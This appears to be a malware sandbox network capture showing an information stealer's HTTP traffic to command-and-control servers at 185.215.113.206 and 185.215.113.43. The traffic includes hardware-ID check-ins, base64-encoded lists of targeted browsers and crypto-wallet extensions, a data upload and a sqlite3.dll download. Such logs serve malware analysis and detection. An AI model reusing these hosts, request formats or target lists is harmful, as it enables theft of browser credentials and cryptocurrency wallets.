Nov 5, 2024 20:52:14.829626083 CET	1236	IN	Data Raw: b6 0d 93 37 23 a9 6f 9b 34 97 44 74 5f d1 87 cf c5 d2 0b 41 9a 9a e7 ef f5 95 1b e8 b4 a9 27 74 81 02 30 a1 63 24 38 49 cd 78 71 eb 77 84 26 39 fc 88 79 33 f0 ce 02 be 06 b8 96 25 d1 ce a9 53 c5 a1 e9 f3 a8 fa 2b 88 e4 31 79 77 b4 01 ee 7a 2c c2 Data Ascii: 7#o4Dt_A't0c$8Ixqw&9y3%S+1ywz,0VTr'm`,o4DhHi!0wXy?T9@y:KM!L0#sCg9$wM7<~n4T,xtboTLEfHW8)
Nov 5, 2024 20:52:14.834657907 CET	1236	IN	Data Raw: bd a7 7b a7 34 ed 22 e7 91 40 c2 3b ff 1c 50 81 3c 3a 61 b4 de df d0 3a e4 e0 6a 50 9c 52 f8 80 c0 47 4a 0b ed 96 af 99 52 9f 52 79 b3 bf e3 13 b7 3f b2 5e 91 78 89 3a a9 e3 6a 3f e4 e4 11 10 c3 27 41 4b af 5d 70 a9 70 f1 e1 12 02 48 7f 5f 02 3e Data Ascii: {4"@;P<:a:jPRGJRRy?^x:j?'AK]ppH_>q'uHvUM~5>`39jur/4Arh/Iw:lc$uc~QgfF9n/M5qk:0[HxbAWRUTJ4xz

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 20:52:18.930851936 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 34 31 39 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004195001&unit=246122658369
Nov 5, 2024 20:52:19.836735010 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 19:52:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 20:52:19.657516003 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 5, 2024 20:52:20.569349051 CET	203	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 19:52:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 5, 2024 20:52:20.745115995 CET	412	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKE Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 45 45 36 36 44 45 35 30 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 2d 2d 0d 0a Data Ascii: ------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="hwid"DCEE66DE5039786254513------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="build"tale------IIJEBFCFIJJJEBGDBAKE--
Nov 5, 2024 20:52:21.039869070 CET	407	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 19:52:20 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4e 6a 68 68 59 57 45 77 4e 44 42 68 4d 7a 51 34 59 7a 42 68 4d 44 4a 68 4f 54 56 6a 5a 6d 46 69 4e 6a 56 6d 4e 7a 59 34 59 57 4e 6c 4d 57 55 77 4d 57 49 32 4e 54 4d 79 4e 54 51 33 59 54 63 77 4e 6a 41 79 4e 54 5a 6d 59 57 55 30 4f 57 52 6d 4e 7a 4a 6c 4f 54 51 31 59 6d 49 32 59 57 55 34 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: NjhhYWEwNDBhMzQ4YzBhMDJhOTVjZmFiNjVmNzY4YWNlMWUwMWI2NTMyNTQ3YTcwNjAyNTZmYWU0OWRmNzJlOTQ1YmI2YWU4fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Nov 5, 2024 20:52:21.041877985 CET	470	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJEHCGIJECFIECBFIDGD Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 38 61 61 61 30 34 30 61 33 34 38 63 30 61 30 32 61 39 35 63 66 61 62 36 35 66 37 36 38 61 63 65 31 65 30 31 62 36 35 33 32 35 34 37 61 37 30 36 30 32 35 36 66 61 65 34 39 64 66 37 32 65 39 34 35 62 62 36 61 65 38 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 2d 2d 0d 0a Data Ascii: ------IJEHCGIJECFIECBFIDGDContent-Disposition: form-data; name="token"68aaa040a348c0a02a95cfab65f768ace1e01b6532547a7060256fae49df72e945bb6ae8------IJEHCGIJECFIECBFIDGDContent-Disposition: form-data; name="message"browsers------IJEHCGIJECFIECBFIDGD--
Nov 5, 2024 20:52:21.325829983 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 19:52:21 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2064 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 58 45 64 76 62 32 64 73 5a 56 78 63 51 32 68 79 62 32 31 6c 58 46 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 63 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4d 48 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 57 31 70 5a 32 39 38 58 45 46 74 61 57 64 76 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcXFByb2dyYW0gRmlsZXNcXEdvb2dsZVxcQ2hyb21lXFxBcHBsaWNhdGlvblxcfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8MHxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8QW1pZ298XEFtaWdvXFVzZXIgRGF0YXxjaHJvbWV8MHwwfFRvcmNofFxUb3JjaFxVc2VyIERhdGF8Y2hyb21lfDB8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8JUxPQ0FMQVBQREFUQSVcXFZpdmFsZGlcXEFwcGxpY2F0aW9uXFx8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8MHxFcGljUHJpdmFjeUJyb3dzZXJ8XEVwaWMgUHJpdmFjeSBCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8ZXBpYy5leGV8JUxPQ0FMQVBQREFUQSVcXEVwaWMgUHJpdmFjeSBCcm93c2VyXFxBcHBsaWNhdGlvblxcfENvY0NvY3xcQ29jQ29jXEJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxicm93c2VyLmV4ZXxDOlxcUHJvZ3JhbSBGaWxlc1xcQ29jQ29jXFxCcm93c2VyXFxBcHBsaWNhdGlvblxcfEJyYXZlfFxCcmF2ZVNvZnR3YXJlXEJyYXZlLUJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxicmF2ZS5leGV8QzpcXFByb2dyYW0gRmlsZXNcXEJyYXZlU29mdHdhcmVcXEJyYXZlLUJyb3dz
Nov 5, 2024 20:52:21.325860977 CET	1056	IN	Data Raw: 5a 58 4a 63 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 46 78 38 51 32 56 75 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 Data Ascii: ZXJcXEFwcGxpY2F0aW9uXFx8Q2VudCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcXENlbnRCcm93c2VyXFxBcHBsaWNhdGlvblxcfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXI
Nov 5, 2024 20:52:21.327496052 CET	469	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCFCFCGCGIEHIECAFCFI Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 46 43 46 43 47 43 47 49 45 48 49 45 43 41 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 38 61 61 61 30 34 30 61 33 34 38 63 30 61 30 32 61 39 35 63 66 61 62 36 35 66 37 36 38 61 63 65 31 65 30 31 62 36 35 33 32 35 34 37 61 37 30 36 30 32 35 36 66 61 65 34 39 64 66 37 32 65 39 34 35 62 62 36 61 65 38 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 43 46 43 47 43 47 49 45 48 49 45 43 41 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 43 46 43 47 43 47 49 45 48 49 45 43 41 46 43 46 49 2d 2d 0d 0a Data Ascii: ------GCFCFCGCGIEHIECAFCFIContent-Disposition: form-data; name="token"68aaa040a348c0a02a95cfab65f768ace1e01b6532547a7060256fae49df72e945bb6ae8------GCFCFCGCGIEHIECAFCFIContent-Disposition: form-data; name="message"plugins------GCFCFCGCGIEHIECAFCFI--
Nov 5, 2024 20:52:21.615664005 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 19:52:21 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Nov 5, 2024 20:52:21.615696907 CET	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Nov 5, 2024 20:52:21.615714073 CET	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Nov 5, 2024 20:52:21.615732908 CET	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Nov 5, 2024 20:52:21.615750074 CET	1236	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Nov 5, 2024 20:52:21.615766048 CET	1164	IN	Data Raw: 56 32 46 73 62 47 56 30 66 47 68 6c 5a 57 5a 76 61 47 46 6d 5a 6d 39 74 61 32 74 72 63 47 68 75 62 48 42 76 61 47 64 73 62 6d 64 74 59 6d 4e 6a 62 47 68 70 66 44 46 38 4d 48 77 77 66 46 68 32 5a 58 4a 7a 5a 53 42 58 59 57 78 73 5a 58 52 38 61 57 Data Ascii: V2FsbGV0fGhlZWZvaGFmZm9ta2trcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGp
Nov 5, 2024 20:52:21.618390083 CET	470	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDAKEHIIDGDAAKECBFB Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 38 61 61 61 30 34 30 61 33 34 38 63 30 61 30 32 61 39 35 63 66 61 62 36 35 66 37 36 38 61 63 65 31 65 30 31 62 36 35 33 32 35 34 37 61 37 30 36 30 32 35 36 66 61 65 34 39 64 66 37 32 65 39 34 35 62 62 36 61 65 38 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 2d 2d 0d 0a Data Ascii: ------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="token"68aaa040a348c0a02a95cfab65f768ace1e01b6532547a7060256fae49df72e945bb6ae8------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="message"fplugins------BGDAKEHIIDGDAAKECBFB--
Nov 5, 2024 20:52:21.902893066 CET	335	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 19:52:21 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Nov 5, 2024 20:52:21.929721117 CET	203	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFBKKFBAEGDHJJJJKFBK Host: 185.215.113.206 Content-Length: 7535 Connection: Keep-Alive Cache-Control: no-cache
Nov 5, 2024 20:52:21.929812908 CET	7535	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 38 61 61 61 30 Data Ascii: ------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="token"68aaa040a348c0a02a95cfab65f768ace1e01b6532547a7060256fae49df72e945bb6ae8------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Nov 5, 2024 20:52:22.728318930 CET	202	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 19:52:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 5, 2024 20:52:22.729080915 CET	94	OUT	GET /746f34465cf17784/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 5, 2024 20:52:23.011163950 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 19:52:22 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Nov 5, 2024 20:52:23.011181116 CET	112	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @
Nov 5, 2024 20:52:23.011296988 CET	1236	IN	Data Raw: 10 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: B
